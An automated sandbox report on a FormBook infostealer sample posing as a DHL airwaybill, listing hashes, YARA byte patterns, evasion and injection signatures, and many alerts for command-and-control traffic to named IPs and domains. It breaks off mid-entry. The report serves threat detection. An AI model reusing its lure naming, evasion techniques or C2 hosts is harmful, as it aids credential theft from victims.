Windows Analysis Report
DHL airwaybill # 6913321715 & BL Draft copy.exe

Overview

General Information

Sample name: DHL airwaybill # 6913321715 & BL Draft copy.exe
Analysis ID: 1505412
MD5: 7e3feacbde086188081c1fa2c0891090
SHA1: c3a3e3d1c8d8d716ce7ce4d2e3a32271d75fdbda
SHA256: 07374ff867cc60e550cbae355fbb87e46eb76fc7cd74ba4005125d1ac3329e52
Tags: DHL, exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL airwaybill # 6913321715 & BL Draft copy.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe" MD5: 7E3FEACBDE086188081C1FA2C0891090)
    • DHL airwaybill # 6913321715 & BL Draft copy.exe (PID: 3620 cmdline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe" MD5: 7E3FEACBDE086188081C1FA2C0891090)
      • toceDGfrPzLv.exe (PID: 5412 cmdline: "C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 3508 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • firefox.exe (PID: 1944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

            AV Detection

            Source: http://www.kalomor.top/pf98/, Avira URL Cloud: Label: malware
            Source: kalomor.top, Virustotal: Detection: 7%
            Source: www.kalomor.top, Virustotal: Detection: 5%
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, ReversingLabs: Detection: 60%
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, Virustotal: Detection: 53%
            Source: Yara match, File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, Joe Sandbox ML: detected
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ZYkF.pdbSHA256 source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: ZYkF.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: mshta.pdbGCTL source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: toceDGfrPzLv.exe, 00000005.00000002.4604412085.0000000000FFE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 6_2_0053C210 FindFirstFileW,FindNextFileW,FindClose, 6_2_0053C210
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe, Code function: 4x nop then pop edi, 5_2_05F83659
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe, Code function: 4x nop then xor eax, eax, 5_2_05F86BA0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then xor eax, eax, 6_2_00529C00
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then pop edi, 6_2_0052DDB3
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_031B04E8

            Networking

            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 192.185.16.209:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49725 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49729 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49729 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49734 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49734 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49737 -> 192.185.16.209:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49723 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49723 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49744 -> 154.23.184.240:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49744 -> 154.23.184.240:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49739 -> 192.185.16.209:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49739 -> 192.185.16.209:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 192.185.16.209:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49745 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49748 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49748 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 154.23.184.240:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49769 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49769 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49749 -> 184.94.212.115:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49773 -> 5.144.130.52:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49777 -> 162.241.226.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49757 -> 91.215.85.23:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49764 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49755 -> 91.215.85.23:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49733 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49751 -> 184.94.212.115:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49762 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49776 -> 162.241.226.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49763 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49760 -> 121.199.37.19:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49775 -> 162.241.226.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49768 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49777 -> 162.241.226.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49773 -> 5.144.130.52:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49757 -> 91.215.85.23:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49774 -> 162.241.226.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49771 -> 5.144.130.52:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49765 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49765 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49778 -> 217.160.0.193:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 154.23.184.240:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49750 -> 184.94.212.115:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49780 -> 217.160.0.193:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49741 -> 154.23.184.240:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 65.21.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49759 -> 121.199.37.19:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49761 -> 121.199.37.19:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49761 -> 121.199.37.19:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49767 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49754 -> 91.215.85.23:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49766 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49770 -> 5.144.130.52:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49756 -> 91.215.85.23:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49752 -> 184.94.212.115:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49758 -> 121.199.37.19:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49752 -> 184.94.212.115:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49772 -> 5.144.130.52:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49782 -> 217.160.0.193:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49782 -> 217.160.0.193:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49779 -> 217.160.0.193:80
            Source: DNS query: www.030003678.xyz
            Source: DNS query: www.030002721.xyz
            Source: Joe Sandbox View, IP Address: 162.240.81.18
            Source: Joe Sandbox View, IP Address: 91.215.85.23
            Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox View, ASN Name: PINDC-ASRU
            Source: Joe Sandbox View, ASN Name: HOSTIRAN-NETWORKIR
            Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET requests
            Source: global traffic | DNS traffic detected: DNS queries
            Source: unknown | HTTP traffic detected: POST /wft4/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.030003678.xyz | Content-Length: 207 | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Connection: close | Origin: http://www.030003678.xyz | Referer: http://www.030003678.xyz/wft4/ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Fri, 06 Sep 2024 07:05:13 GMT | vary: User-Agent
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Fri, 06 Sep 2024 07:05:16 GMT | vary: User-Agent
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Fri, 06 Sep 2024 07:05:18 GMT | vary: User-Agent
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Fri, 06 Sep 2024 07:05:21 GMT | vary: User-Agent
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 06 Sep 2024 07:05:27 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 06 Sep 2024 07:05:30 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 06 Sep 2024 07:05:32 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 06 Sep 2024 07:05:35 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:05:41 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2,h2c
            Connection: Upgrade
            Vary: Accept-Encoding
            Content-Encoding: gzip
            X-Endurance-Cache-Level: 2
            X-nginx-cache: WordPress
            Content-Length: 11436
            Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:05:44 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2,h2c
            Connection: Upgrade
            Vary: Accept-Encoding
            Content-Encoding: gzip
            X-Endurance-Cache-Level: 2
            X-nginx-cache: WordPress
            Content-Length: 11436
            Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:05:46 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2,h2c
            Connection: Upgrade
            Vary: Accept-Encoding
            Content-Encoding: gzip
            X-Endurance-Cache-Level: 2
            X-nginx-cache: WordPress
            Content-Length: 11436
            Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 06 Sep 2024 07:06:00 GMT
            Content-Type: text/html
            Content-Length: 148
            Connection: close
            ETag: "66a8e223-94"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 06 Sep 2024 07:06:03 GMT
            Content-Type: text/html
            Content-Length: 148
            Connection: close
            ETag: "66a8e223-94"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 06 Sep 2024 07:06:05 GMT
            Content-Type: text/html
            Content-Length: 148
            Connection: close
            ETag: "66a8e223-94"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 06 Sep 2024 07:06:08 GMT
            Content-Type: text/html
            Content-Length: 148
            Connection: close
            ETag: "66a8e223-94"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 796
            date: Fri, 06 Sep 2024 07:06:22 GMT
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 796
            date: Fri, 06 Sep 2024 07:06:24 GMT
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 796
            date: Fri, 06 Sep 2024 07:06:27 GMT
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic
